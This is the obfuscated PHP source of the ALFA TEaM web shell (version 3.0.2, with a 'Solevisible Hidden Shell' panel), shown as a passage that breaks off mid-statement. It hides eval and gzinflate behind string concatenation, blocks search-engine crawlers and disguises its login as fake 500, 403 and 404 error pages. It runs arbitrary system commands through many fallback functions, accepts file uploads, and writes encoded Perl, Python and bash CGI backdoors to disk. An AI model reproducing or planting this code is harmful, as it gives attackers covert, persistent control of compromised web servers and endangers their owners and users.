'admin',//login username 'paLDRhHfAovu' => '192843a156ba95192842b483ee10696f',//login password (MD5)... ar1ber3 'saEuEgnDlHuL' => '1',//safe mode.. 0 = allow, 1 = deny 'logXKTfQPNcx' => 'gui',//safe mode type.. gui = login and HTTP errors accepted: 500, 404, 403 'shiJVQhUrFkw' => '1',//show icons.. 0 = not show, 1 = show 'pogkUzMiAjqB' => true,//POST encryption ); $XDmfxOnhck='fu'.'nct'.'ion'.'_'.'e'.'x'.'is'.'ts'.'';$RxPWPyQqTL='cha'.'r'.'Cod'.'e'.'A'.'t'.'';$CyvIHOdCHU='e'.'va'.'l'.'';$jgpUDiTPrk='g'.'zi'.'nf'.'l'.'at'.'e'.'';if(!$XDmfxOnhck('bas'.'e'.'6'.'4_e'.'ncod'.'e'.'')){function nIWUkxhnhj($data){if(empty($data))return;$b64='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';$o1 = $o2 = $o3 = $h1 = $h2 = $h3 = $h4 = $bits = $i = 0;$ac = 0;$enc = '';$tmp_arr = array();if(!$data){return $data;}do{$o1 = $RxPWPyQqTL($data, $i++);$o2 = $RxPWPyQqTL($data, $i++);$o3 = $RxPWPyQqTL($data, $i++);$bits = $o1 << 16 | $o2 << 8 | $o3;$h1 = $bits >> 18 & 0x3f;$h2 = $bits >> 12 & 0x3f;$h3 = $bits >> 6 & 0x3f;$h4 = $bits & 0x3f;$tmp_arr[$ac++] = charAt($b64, $h1).charAt($b64, $h2).charAt($b64, $h3).charAt($b64, $h4);} while ($i < strlen($data));$enc = implode($tmp_arr, '');$r = (strlen($data) % 3);return ($r ? substr($enc, 0, ($r - 3)) : $enc).substr('===', ($r || 3));}function charCodeAt($data, $char){ return ord(substr($data, $char, 1));}function charAt($data, $char){return substr($data, $char, 1);}}else{function nIWUkxhnhj($s){$b='bas'.'e'.'6'.'4_e'.'ncod'.'e'.'';return $b($s);}}if(!$XDmfxOnhck('b'.'ase'.'6'.'4_deco'.'d'.'e')){function QFdAWqZnUX($input){if(empty($input))return;$keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";$chr1 = $chr2 = $chr3 = "";$enc1 = $enc2 = $enc3 = $enc4 = "";$i = 0;$output = "";$input = preg_replace("[^A-Za-z0-9\+\/\=]", "", $input);do{$enc1 = strpos($keyStr, substr($input, $i++, 1));$enc2 = strpos($keyStr, substr($input, $i++, 1));$enc3 = strpos($keyStr, substr($input, $i++, 1));$enc4 = strpos($keyStr, substr($input, $i++, 1));$chr1 = ($enc1 << 2) | ($enc2 >> 4);$chr2 = (($enc2 & 15) << 4) | ($enc3 >> 2);$chr3 = (($enc3 & 3) << 6) | $enc4;$output = $output . chr((int) $chr1);if ($enc3 != 64) {$output = $output . chr((int) $chr2);}if ($enc4 != 64) {$output = $output . chr((int) $chr3);}$chr1 = $chr2 = $chr3 = "";$enc1 = $enc2 = $enc3 = $enc4 = "";}while($i < strlen($input));return $output;}}else{function QFdAWqZnUX($s){$b='b'.'ase'.'6'.'4_deco'.'d'.'e';return $b($s);}}$gEleJRqGNj='create_fun'.'ct'.'io'.'n';$oFcbuslxiL = $gEleJRqGNj('$cq',$CyvIHOdCHU.'('.$jgpUDiTPrk.'('.'Q'.'FdAW'.'qZ'.'n'.'U'.'X'.''.'($cq)'.')'.')'.';'); /* ufBAyNiLYhXtEhSseNmZlGuuOwOGcBLTnsgEApHxXujFVanOXqNpNWAMnYLMAGHaHTpIuoJkmboVlvpvaebpEaoskOINIUDeEhGI */ /* You're killing me again ? Am I still in your head ? ? You used to light me up ? Now you shut me down -- Solevisible */ @session_start();function __ZW5jb2Rlcg($s){return nIWUkxhnhj($s);}function __ZGVjb2Rlcg($s){return QFdAWqZnUX($s);}$GLOBALS['DB_NAME'] = $GLOBALS['NeUSMyPGXP'];$check = false;if(!isset($_SESSION["alfa_settings_signature"])){$check = true;}else{if($_SESSION["alfa_settings_signature"] != md5(print_r($GLOBALS['DB_NAME'], true))){$check = true;}}if($check){$_SESSION["alfa_settings_signature"] = md5(print_r($GLOBALS['DB_NAME'], true));foreach($GLOBALS['NeUSMyPGXP'] as $key => $value){$prefix = substr($key, 0, 2);if($prefix == "us"){$GLOBALS['DB_NAME']["user"] = $value;$GLOBALS['DB_NAME']["user_rand"] = $key;}elseif($prefix == "pa"){$GLOBALS['DB_NAME']["pass"] = $value;$GLOBALS['DB_NAME']["pass_rand"] = $key;}elseif($prefix == "sa"){$GLOBALS['DB_NAME']["safemode"] = $value;$GLOBALS['DB_NAME']["safemode_rand"] = $key;}elseif($prefix == "lo"){$GLOBALS['DB_NAME']["login_page"] = $value;$GLOBALS['DB_NAME']["login_page_rand"] = $key;}elseif($prefix == "sh"){$GLOBALS['DB_NAME']["show_icons"] = $value;$GLOBALS['DB_NAME']["show_icons_rand"] = $key;}elseif($prefix == "po"){$GLOBALS['DB_NAME']["post_encryption"] = $value;$GLOBALS['DB_NAME']["post_encryption_rand"] = $key;}}$_SESSION["alfa_db_settings"] = $GLOBALS['DB_NAME'];}else{$GLOBALS['DB_NAME'] = $_SESSION["alfa_db_settings"];}unset($GLOBALS['NeUSMyPGXP']); if(!isset($_SERVER["HTTP_HOST"]))exit(); if(!empty($_SERVER['HTTP_USER_AGENT'])){$userAgents = array("Google","Slurp","MSNBot","ia_archiver","Yandex","Rambler","bot","spider");if(preg_match('/'.implode('|',$userAgents).'/i',$_SERVER['HTTP_USER_AGENT'])){header('HTTP/1.0 404 Not Found');exit;}} if(!isset($GLOBALS['DB_NAME']['user']))exit('$GLOBALS[\'DB_NAME\'][\'user\']'); if(!isset($GLOBALS['DB_NAME']['pass']))exit('$GLOBALS[\'DB_NAME\'][\'pass\']'); if(!isset($GLOBALS['DB_NAME']['safemode']))exit('$GLOBALS[\'DB_NAME\'][\'safemode\']'); if(!isset($GLOBALS['DB_NAME']['login_page']))exit('$GLOBALS[\'DB_NAME\'][\'login_page\']'); if(!isset($GLOBALS['DB_NAME']['show_icons']))exit('$GLOBALS[\'DB_NAME\'][\'show_icons\']'); if(!isset($GLOBALS['DB_NAME']['post_encryption']))exit('$GLOBALS[\'DB_NAME\'][\'post_encryption\']'); date_default_timezone_set('Asia/Tehran'); define("__ALFA_MD5NAME__", md5($_SERVER["SCRIPT_FILENAME"])); define("__ALFA_VERSION__", "3.0.2"); define("__LAST_CWD__", "last_cwd_".__ALFA_MD5NAME__); define("__PATH_HISTORY__", "path_history_".__ALFA_MD5NAME__); define("__ALFA_POST_ENCRYPTION__", (isset($GLOBALS["DB_NAME"]["post_encryption"])&&$GLOBALS["DB_NAME"]["post_encryption"]==true?true:false)); $GLOBALS['__ALFA_COLOR__'] = array( "shell_border" => array( "key_color" => "#0E304A", "multi_selector" => array( ".header" => "border: 7px solid {color}", "#meunlist" => "border-color: {color}", "#hidden_sh" => "background-color: {color}", ".ajaxarea" => "border: 1px solid {color}", ".foot" => "border-color: {color}", ) ), "header_vars" => "#27979B", "header_values" => "#67ABDF", "header_on" => "#00FF00", "header_off" => "#ff0000", "header_none" => "#00FF00", "home_shell" => "#ff0000", "home_shell:hover" => array( "key_color" => "#FFFFFF", "multi_selector" => array( ".home_shell:hover" => "color: {color};", ) ), "back_shell" => "#efbe73", "back_shell:hover" => array( "key_color" => "#FFFFFF", "multi_selector" => array( ".back_shell:hover" => "color: {color};", ) ), "header_pwd" => "#00FF00", "header_pwd:hover" => array( "key_color" => "#FFFFFF", "multi_selector" => array( ".header_pwd:hover" => "color: {color};", ) ), "header_drive" => "#00FF00", "header_drive:hover" => array( "key_color" => "#FFFFFF", "multi_selector" => array( ".header_drive:hover" => "color: {color};", ) ), "header_show_all" => "#00FF00", "disable_functions" => "#ff0000", "footer_text" => "#27979B", "menu_options" => "#27979B", "menu_options:hover" => array( "key_color" => "#646464", "multi_selector" => array( ".menu_options:hover" => "background-color: {color};font-weight: unset;", ) ), "options_list" => array( "key_color" => "#00FF00", "multi_selector" => array( ".ajaxarea .header center a" => "color: {color};", ) ), "options_list:hover" => array( "key_color" => "#FFFFFF", "multi_selector" => array( ".ajaxarea .header center a:hover" => "color: {color};", ) ), "options_list_header" => array( "key_color" => "#59cc33", "multi_selector" => array( ".txtfont_header" => "color: {color};", ) ), "options_list_text" => array( "key_color" => "#FFFFFF", "multi_selector" => array( ".txtfont,.tbltxt" => "color: {color};", ) ), "Alfa+" => array( "key_color" => "#27E8AE", "multi_selector" => array( ".alfa_plus" => "color: {color};font-weight: unset;", ) ), "hidden_shell_text" => array( "key_color" => "#00FF00", "multi_selector" => array( "#hidden_sh a" => "color: {color};", ) ), "hidden_shell_version" => "#ff0000", "shell_name" => "#FF0000", "main_row:hover" => array( "key_color" => "#646464", "multi_selector" => array( ".main tr:hover" => "background-color: {color};", ) ), "main_header" => array( "key_color" => "#FFFFFF", "multi_selector" => array( ".main th" => "color: {color};", ) ), "main_name" => array( "key_color" => "#FFFFFF", "multi_selector" => array( ".main .main_name" => "color: {color};font-weight: unset;", ) ), "main_size" => "#67ABDF", "main_modify" => "#67ABDF", "main_owner_group" => "#67ABDF", "main_green_perm" => "#25ff00", "main_red_perm" => "#FF0000", "main_white_perm" => "#FFFFFF", "beetween_perms" => "#FFFFFF", "main_actions" => array( "key_color" => "#FFFFFF", "multi_selector" => array( ".main .actions" => "color: {color};", ) ), "menu_options:hover" => array( "key_color" => "#646464", "multi_selector" => array( ".menu_options:hover" => "background-color: {color};font-weight: unset;", ) ), "minimize_editor_background" => array( "key_color" => "#0e304a", "multi_selector" => array( ".minimized-wrapper" => "background-color: {color};", ) ), "minimize_editor_text" => array( "key_color" => "#f5deb3", "multi_selector" => array( ".minimized-text" => "color: {color};", ) ), "editor_border" => array( "key_color" => "#0e304a", "multi_selector" => array( ".editor-explorer,.editor-modal" => "border: 2px solid {color};", ) ), "editor_background" => array( "key_color" => "rgba(0, 1, 23, 0.94)", "multi_selector" => array( ".editor-explorer,.editor-modal" => "background-color: {color};", ) ), "editor_header_background" => array( "key_color" => "rgba(21, 66, 88, 0.93)", "multi_selector" => array( ".editor-header" => "background-color: {color};", ) ), "editor_header_text" => array( "key_color" => "#00ff7f", "multi_selector" => array( ".editor-path" => "color: {color};", ) ), "editor_header_button" => array( "key_color" => "#1d5673", "multi_selector" => array( ".close-button, .editor-minimize" => "background-color: {color};", ) ), "editor_actions" => array( "key_color" => "#FFFFFF", "multi_selector" => array( ".editor_actions" => "color: {color};", ) ), "editor_file_info_vars" => array( "key_color" => "#FFFFFF", "multi_selector" => array( ".editor_file_info_vars" => "color: {color};", ) ), "editor_file_info_values" => array( "key_color" => "#67ABDF", "multi_selector" => array( ".filestools" => "color: {color};", ) ), "editor_history_header" => array( "key_color" => "#14ff07", "multi_selector" => array( ".hheader-text,.history-clear" => "color: {color};", ) ), "editor_history_list" => array( "key_color" => "#03b3a3", "multi_selector" => array( ".editor-file-name" => "color: {color};", ) ), "editor_history_selected_file" => array( "key_color" => "rgba(49, 55, 93, 0.77)", "multi_selector" => array( ".is_active" => "background-color: {color};", ) ), "editor_history_file:hover" => array( "key_color" => "#646464", "multi_selector" => array( ".file-holder > .history:hover" => "background-color: {color};", ) ), "input_box_border" => array( "key_color" => "#0E304A", "multi_selector" => array( "input[type=text],textarea" => "border: 1px solid {color}", ) ), "input_box_text" => array( "key_color" => "#999999", "multi_selector" => array( "input[type=text],textarea" => "color: {color};", ) ), "input_box:hover" => array( "key_color" => "#27979B", "multi_selector" => array( "input[type=text]:hover,textarea:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};", ) ), "select_box_border" => array( "key_color" => "#0E304A", "multi_selector" => array( "select" => "border: 1px solid {color}", ) ), "select_box_text" => array( "key_color" => "#FFFFEE", "multi_selector" => array( "select" => "color: {color};", ) ), "select_box:hover" => array( "key_color" => "#27979B", "multi_selector" => array( "select:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};", ) ), "button_border" => array( "key_color" => "#27979B", "multi_selector" => array( "input[type=submit],.button,#addup" => "border: 1px solid {color};", ) ), "button:hover" => array( "key_color" => "#27979B", "multi_selector" => array( "input[type=submit]:hover" => "box-shadow:0 0 4px {color};border:2px solid {color};", ".button:hover,#addup:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};", ) ), "outputs_text" => array( "key_color" => "#67ABDF", "multi_selector" => array( ".ml1" => "color: {color};", ) ), "outputs_border" => array( "key_color" => "#0E304A", "multi_selector" => array( ".ml1" => "border: 1px solid {color};", ) ), "uploader_border" => array( "key_color" => "#0E304A", "multi_selector" => array( ".inputfile" => "box-shadow:0 0 4px {color};border:1px solid {color};", ) ), "uploader_background" => array( "key_color" => "#0E304A", "multi_selector" => array( ".inputfile strong" => "background-color: {color};", ) ), "uploader_text_right" => array( "key_color" => "#FFFFFF", "multi_selector" => array( ".inputfile strong" => "color: {color};", ) ), "uploader_text_left" => array( "key_color" => "#25ff00", "multi_selector" => array( ".inputfile span" => "color: {color};", ) ), "uploader:hover" => array( "key_color" => "#27979B", "multi_selector" => array( ".inputfile:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};", ) ), "uploader_progress_bar" => array( "key_color" => "#ff0000", "multi_selector" => array( "#up_bar" => "background-color: {color};", ) ), "mysql_tables" => "#00FF00", "mysql_table_count" => "#67ABDF", "copyright" => "#ff0000", "scrollbar" => array( "key_color" => "#1e82b5", "multi_selector" => array( "*::-webkit-scrollbar-thumb" => "background-color: {color};", ) ), "scrollbar_background" => array( "key_color" => "#000115", "multi_selector" => array( "*::-webkit-scrollbar-track" => "background-color: {color};", ) ), ); $GLOBALS['__file_path'] = str_replace('\\','/',trim(preg_replace('!\(\d+\)\s.*!', '', __FILE__))); $config = array('AlfaUser' => $GLOBALS['DB_NAME']['user'],'AlfaPass' => $GLOBALS['DB_NAME']['pass'],'AlfaProtectShell' => $GLOBALS['DB_NAME']['safemode'],'AlfaLoginPage' => $GLOBALS['DB_NAME']['login_page']); @session_start(); if($config['AlfaProtectShell']){ $SERVER_SIG = (isset($_SERVER["SERVER_SIGNATURE"])?$_SERVER["SERVER_SIGNATURE"]:""); $Eform='
'; if($config['AlfaLoginPage'] == 'gui'){ if(@$_SESSION["AlfaUser"] != $config['AlfaUser'] && @$_SESSION["AlfaPass"] != @md5($config['AlfaPass'])){ if(@$_POST["usrname"]==$config['AlfaUser'] && @md5($_POST["password"])==$config['AlfaPass']){ @$_SESSION["AlfaUser"] = $config['AlfaUser']; @$_SESSION["AlfaPass"] = @md5($config['AlfaPass']); @header('location: '.$_SERVER["PHP_SELF"]); } echo ' ~ ALFA TEaM Shell-v'.__ALFA_VERSION__.' ~

~ ALFA TEaM Shell-v'.__ALFA_VERSION__.' ~
Login:
Password:
 

'; exit; } }elseif($config['AlfaLoginPage']=='500'){ if(@$_SESSION["AlfaPass"] != @md5($config['AlfaPass'])){ if(@md5($_POST["password"])==$config['AlfaPass']){ @$_SESSION["AlfaUser"] = $config['AlfaUser']; @$_SESSION["AlfaPass"] = @md5($config['AlfaPass']); header('location: '.$_SERVER["PHP_SELF"]); } echo '500 Internal Server Error

Internal Server Error

The server encountered an internal error or misconfiguration and was unable to complete your request.

Please contact the server administrator, '.$_SERVER['SERVER_ADMIN'].' and inform them of the time the error occurred, and anything you might have done that may have caused the error.

More information about this error may be available in the server error log.


'.$SERVER_SIG.''.$Eform; exit; } }elseif($config['AlfaLoginPage']=='403'){ if(@$_SESSION["AlfaPass"] != @md5($config['AlfaPass'])){ if(@md5($_POST["password"])==$config['AlfaPass']){ @$_SESSION["AlfaUser"] = $config['AlfaUser']; @$_SESSION["AlfaPass"] = @md5($config['AlfaPass']); header('location: '.$_SERVER["PHP_SELF"]); } echo "403 Forbidden

Forbidden

You don't have permission to access ".$_SERVER['PHP_SELF']." on this server.


".$SERVER_SIG."".$Eform; exit; } }elseif($config['AlfaLoginPage']=='404'){ if(@$_SESSION["AlfaPass"] != @md5($config['AlfaPass'])){ if(@md5($_POST["password"])==$config['AlfaPass']){ @$_SESSION["AlfaUser"] = $config['AlfaUser']; @$_SESSION["AlfaPass"] = @md5($config['AlfaPass']); header('location: '.$_SERVER["PHP_SELF"]); } echo "404 Not Found

Not Found

The requested URL ".$_SERVER['PHP_SELF']." was not found on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.


".$SERVER_SIG."".$Eform; exit; } } } function decrypt_post($str, $pwd){ if(__ALFA_POST_ENCRYPTION__){ $pwd = __ZW5jb2Rlcg($pwd); $str = __ZGVjb2Rlcg($str); $enc_chr = ""; $enc_str = ""; $i = 0; while ($i < strlen($str)) { for ($j = 0; $j < strlen($pwd); $j++) { $enc_chr = chr(ord($str[$i]) ^ ord($pwd[$j])); $enc_str .= $enc_chr; $i++; if ($i >= strlen($str)) break; } } return __ZGVjb2Rlcg($enc_str); }else{ return __ZGVjb2Rlcg($str); } } function _AlfaSecretKey(){ if(!isset($_SESSION["AlfaSecretKey"])){ $_SESSION["AlfaSecretKey"] = uniqid(mt_rand(), true); } return $_SESSION["AlfaSecretKey"]; } function alfa_getColor($target){ if(isset($GLOBALS["DB_NAME"]["color"][$target])&&$GLOBALS["DB_NAME"]["color"][$target]!=""){ return $GLOBALS["DB_NAME"]["color"][$target]; }else{ $target = $GLOBALS["__ALFA_COLOR__"][$target]; if(is_array($target)){ return $target["key_color"]; }else{ return $target; } } } function alfaCssLoadColors(){ $css = ""; foreach($GLOBALS['__ALFA_COLOR__'] as $key => $value){ if(!is_array($value)){ $value = alfa_getColor($key); $css .= ".{$key}{color: {$value};}"; }else{ if(isset($value["multi_selector"])){ foreach($value["multi_selector"] as $k => $v){ $color = alfa_getColor($key); $code = str_replace("{color}", $color, $v); $css .= $k."{".$code."}"; } } } } return $css; } if(isset($_POST['ajax'])){ function AlfaNum(){ $args = func_get_args(); $alfax = array(); $find = array(); for($i=1;$i<=10;$i++){ $alfax[] = $i; } foreach($args as $arg){ $find[] = $arg; } echo ''; }} function _alfa_cgicmd($cmd,$lang="perl"){ if(isset($_SESSION["alfacgiapi_mode"])){ return ""; } $cmd_pure = $cmd; $is_curl = function_exists('curl_version'); $is_socket = function_exists('fsockopen'); if($is_curl||$is_socket){ $recreate = false; if(isset($_SESSION["alfacgiapi"])){ if(!@file_exists("alfacgiapi/".$_SESSION["alfacgiapi"].".alfa")){ $recreate = true; $lang = $_SESSION["alfacgiapi"]; } } if(!isset($_SESSION["alfacgiapi"])||$recreate){ @chdir(dirname($_SERVER["SCRIPT_FILENAME"])); $perl = 'jZFRT8IwFIXf/RXXOqWNsKoxPlAwRliERIbK9EUMGdsFGrYyt2Iky/ztdkMlJj74cpKee853k96Dfb7OUj6ViieYRgDQ6FdOtAr8iE99FcZS7a0zhEF/4DSb136GF+ciSaXSQDorpVHpht4k2ASN75ovdByN1VgRIWfUctynvPbg3D86I28ycLzesFsrAF+B3A1HHmF5vAFqyTpYS9wYffMjo1IxkaIf0pHX7buVYaRidYau57je5NZxb7xerWDiSipoQ5ZEUlN+xL/qs5UBBAvzAHoCtg3WgbFzM3u25Au0PyDj42MOfC7objfbkdpbUpmuwxkTZWhbO6S2zXjiB0tKAlKHBb5T65QxPkdRQv6RkioveQXYbSDjEwJyBjTEmVQY0p8pY7+TJVwU5bcalwRxSAqWby8RYrAKcTKtrvM1X2CwNAmbtJIUL4nINpnGmP4VrVDs+6otXhWK4hM='; $py = "bZDBS8MwGMXPy19R66EtzhRk7DA3L1rxItOt3gajTb6twTQJydexIf7vJqvMiR5CyHvv93jk8iLvnM1roXJzwEYrgvYwIQPRGm0xYluB9W1/UVBVLSHNCOwZGPQpUzlHvqPaDX1sWFcOxiOy0baNZgGkjwIkX6K21RZSUDthtZp9JIvi9a1YluvnonyaPyST5GW+LJPPjLCWezIU0C3grpIdpIkXE281wN7/MYPsbWOFwii+1wpB4TUeDEwQ9pg32MqVXalwYiI2ka8L84/5fjGtxyMOTHNIj3XZVTw1Fu5iMmCNkHztkAs1jE4P3aFfoh012oC6Sf/WtDzLftGUSe3CBw4suE4G/ryOWqh4eo4E8cT0a3uSOrTC/KjxND+O/QI="; $bash = "rVRdj5pAFH2uv+I6DGa1Iaybpg9amrRboptYbV360JQGWRiFyPI5WreU/95hoCyjsfFh52nm3nM/zuTcK3XVBz9UH+zM6xDHi0AhgG6jkJKQKvQpJiOg5EBVjz4GZmiGqLPehQ71oxCcjW9tCLW+LO4Na2+n2VU/7wA7PwDhpf71m87sn3VjuviEoKsBKoEIfkKvBymhuzSs0V1QfrMQFrD8bt0by7v5xDqH5cjbxdzQ54Y10+cTYyrCXqXEdkGZwxEKTtLzjHVUIdJyiRO5hHF6poQlUEICw5OegsixA9gDBY+/qYZwPlTV1yoUsoy47ZfnB6RMkku0AGVD4RoUmzHJaVH9jcxYjMGNOLw8+zLNvmAIWTblQYEaDy9ApYHcsvnrC7JTj4RNRHk8jUFG16ObQjBXBZgVCea6I7T6pxOTnQPOvWLV4NY+v7pRSPiFQ6uw/3w3U5Gon/KzAwo3Zz47gRi27MszbnPsjAAegv9MbqIbfaH3RmR5WwZFLZ1EO3b0ROrjcfMslSPmPpmDCypz8Nnylfd8Dx8XxvRF+b0MhaS4nAbJbIdfMs9f0+qmIcADECemrpwcj0fMC8pyrz0Z29IYy7LWNnLZxtJAa9mqdiUcC+Hl3hoiYPPyYTZDoHDlZirgLaj1IOGsJmwKpMghjlLK3FukoZWwQcBEeG+iFRIHoxmElv65toDV7iQ7kj5p+IqPD3YeXfgDbEWTt29AUarU/WpdNxiPONuzqHKpv4tT8t50UId1FbBdwWsULb9aA/4C"; if($lang=="perl")$source = $perl;elseif($lang=="py")$source = $py;else $source = $bash; alfaWriteTocgiapi($lang.".alfa",$source); alfacgihtaccess('cgi', "alfacgiapi/"); }else{ $lang = $_SESSION["alfacgiapi"]; } $cmd = "check=W3NvbGV2aXNpYmxlfmFwaV0=&cmd=".__ZW5jb2Rlcg("cd ".$GLOBALS['cwd'].";".$cmd); if($is_curl){ $address = ($_SERVER['SERVER_PORT'] == 443 ? "https://" : "http://").$_SERVER["SERVER_NAME"].dirname($_SERVER["REQUEST_URI"])."/alfacgiapi/".$lang.".alfa"; $post = new AlfaCURL(); $data = $post->Send($address, "post", $cmd); }elseif($is_socket){ $server = $_SERVER["SERVER_NAME"]; $uri = dirname($_SERVER["REQUEST_URI"])."/alfacgiapi/".$lang.".alfa"; $data = _alfa_fsockopen($server,$uri,$cmd); } $out = ""; if(strstr($data, "[solevisible~api]")){ $_SESSION["alfacgiapi"] = $lang; if(@preg_match("/
(.*?)<\/pre>/s", $data, $res)){
				$out = $res[1];
			}
		}elseif($lang=="perl"){
			return _alfa_cgicmd($cmd_pure,"py");
		}elseif($lang=="py"){
			return _alfa_cgicmd($cmd_pure,"bash");
		}else{
			$_SESSION["alfacgiapi_mode"] = "off";
		}
		return trim($out);
	}else{
		return "";
	}
}
function alfaEx($in,$re=false,$cgi=true,$all=false){
	$data = _alfa_php_cmd($in,$re);
	if(empty($data)&&$cgi||$all){
		if($GLOBALS['sys']=='unix'){
			if(strlen(_alfa_php_cmd("whoami"))==0||$all){
				$cmd = _alfa_cgicmd($in);
				if(!empty($cmd)){
					return $cmd;
				}
			}
		}
	}
	return $data;
}
function _alfa_php_cmd($in,$re=false){
$out='';
try{
if($re)$in=$in." 2>&1";
if(function_exists('exec')){
@exec($in,$out);
$out = @join("\n",$out);
}elseif(function_exists('passthru')) {
ob_start();
@passthru($in);
$out = ob_get_clean();
}elseif(function_exists('system')){
ob_start();
@system($in);
$out = ob_get_clean();
} elseif (function_exists('shell_exec')) {
$out = shell_exec($in);
}elseif(function_exists("popen")&&function_exists("pclose")){
if(is_resource($f = @popen($in,"r"))){
$out = "";
while(!@feof($f))
$out .= fread($f,1024);
pclose($f);
}
}elseif(function_exists('proc_open')){
$pipes = array();
$process = @proc_open($in.' 2>&1', array(array("pipe","w"), array("pipe","w"), array("pipe","w")), $pipes, null);
$out=@stream_get_contents($pipes[1]);
}elseif(class_exists('COM')){
$alfaWs = new COM('WScript.shell');
$exec = $alfaWs->exec('cmd.exe /c '.$_POST['alfa1']);
$stdout = $exec->StdOut();
$out=$stdout->ReadAll();
}
}catch(Exception $e){}
return $out;
}
function _alfa_fsockopen($server,$uri,$post){
	$socket = @fsockopen($server, 80, $errno, $errstr, 15);
	if($socket){
		$http  = "POST {$uri} HTTP/1.0\r\n";
		$http .= "Host: {$server}\r\n";
		$http .= "User-Agent: " . $_SERVER['HTTP_USER_AGENT'] . "\r\n";
		$http .= "Content-Type: application/x-www-form-urlencoded\r\n";
		$http .= "Content-length: " . strlen($post) . "\r\n";
		$http .= "Connection: close\r\n\r\n";
		$http .= $post . "\r\n\r\n";
		fwrite($socket, $http);
		$contents = "";
		while (!@feof($socket)) {
			$contents .= @fgets($socket, 4096);
		}
		list($header, $body) = explode("\r\n\r\n", $contents, 2);
		@fclose($socket);
		return $body;
	}else{
		return "";
	}
}
if(isset($_GET["solevisible"])){
@error_reporting(E_ALL ^ E_NOTICE);
echo '';
echo "Solevisible Hidden Shell";
echo "";
echo 'Kernel : '.(function_exists('php_uname')?php_uname():'???').'';
$safe_mode = @ini_get('safe_mode');
if($safe_mode){$r = "On";}else{$r = "Off";}
echo "
OS: " . PHP_OS . "
"; echo "Software: " . $_SERVER ['SERVER_SOFTWARE'] . "
"; echo "PHP Version: " . PHP_VERSION . "
"; echo "PWD: " . str_replace("\\","/",@getcwd()) . "/
"; echo "Safe Mode : $r
"; echo"Disable functions : "; $disfun = @ini_get('disable_functions'); if(empty($disfun)){$disfun = 'NONE';} echo""; echo "$disfun"; echo"
"; echo "Your Ip Address is :
" . $_SERVER['REMOTE_ADDR'] . "
"; echo "Server Ip Address is : ".(function_exists('gethostbyname')?@gethostbyname($_SERVER["HTTP_HOST"]):'???')."

"; echo '


'; echo 'CWD:

'; if(isset($_FILES['file'])){ if(@move_uploaded_file($_FILES['file']['tmp_name'], __ZGVjb2Rlcg(@$_POST['cwd']).'/'.$_FILES['file']['name'])){echo '
Upload Successfully ;)

'; } else{echo '
Upload failed :(


'; } } echo '
Execute Command:

';
if(isset($_POST['command_solevisible'])){
if(strtolower(substr(PHP_OS,0,3))=="win")$separator='&';else $separator=';';
$solevisible = "cd '".addslashes(str_replace("\\","/",@getcwd()))."'".$separator."".__ZGVjb2Rlcg($_POST['command_solevisible']);
echo alfaEx($solevisible);
}
echo'
'; exit;} @error_reporting(E_ALL ^ E_NOTICE); @ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('max_execution_time',0); @ini_set('magic_quotes_runtime', 0); @set_time_limit(0); if(function_exists('set_magic_quotes_runtime')){ @set_magic_quotes_runtime(0); } foreach($_POST as $key => $value){ if(is_array($_POST[$key])){ $i=0; foreach($_POST[$key] as $f) { $f = trim(str_replace(' ', '+',$f)); $_POST[$key][$i] = decrypt_post($f, _AlfaSecretKey()); $i++; } }else{ $value = trim(str_replace(' ', '+',$value)); $_POST[$key] = decrypt_post($value, _AlfaSecretKey()); } } $default_action = 'FilesMan'; $default_use_ajax = true; $default_charset = 'Windows-1251'; if(strtolower(substr(PHP_OS,0,3))=="win") $GLOBALS['sys']='win'; else $GLOBALS['sys']='unix'; $GLOBALS['home_cwd'] = @getcwd(); if($_POST["a"] != "GetPathHistory"){ if($_SESSION[__LAST_CWD__]!=$_POST['c']){ $_SESSION[__PATH_HISTORY__] = $_SESSION[__LAST_CWD__]; } } $GLOBALS["need_to_update_header"] = "false"; if(isset($_POST['c'])){ if(!@chdir($_POST['c'])){ $GLOBALS['glob_chdir_false'] = true; } } $GLOBALS['cwd'] = (isset($_SESSION[__LAST_CWD__])&&$_SESSION[__LAST_CWD__]!=''&&!isset($_POST['c'])?$_SESSION[__LAST_CWD__]:@getcwd()); if(!@is_dir){$GLOBALS['cwd'] = @getcwd();} if($GLOBALS['sys'] == 'win'){ $GLOBALS['home_cwd'] = str_replace("\\", "/", $GLOBALS['home_cwd']); $GLOBALS['cwd'] = str_replace("\\", "/", $GLOBALS['cwd']); $_SESSION[__PATH_HISTORY__] = str_replace("\\", "/", $_SESSION[__PATH_HISTORY__]); } if($GLOBALS['cwd'][strlen($GLOBALS['cwd'])-1] != '/' )$GLOBALS['cwd'] .= '/'; function alfaGetPathHistory(){echo (isset($_SESSION[__PATH_HISTORY__])&&!empty($_SESSION[__PATH_HISTORY__])?$_SESSION[__PATH_HISTORY__]: $GLOBALS['home_cwd']);} function alfahead(){ if(!function_exists('sys_get_temp_dir')){function sys_get_temp_dir() {foreach (array('TMP', 'TEMP', 'TMPDIR') as $env_var) {if ($temp = getenv($env_var)) {return $temp;}}$temp = tempnam($GLOBALS['__file_path'], '');if (_alfa_file_exists($temp,false)) {unlink($temp);return dirname($temp);}return null;}} $GLOBALS['__ALFA_SHELL_CODE'] = 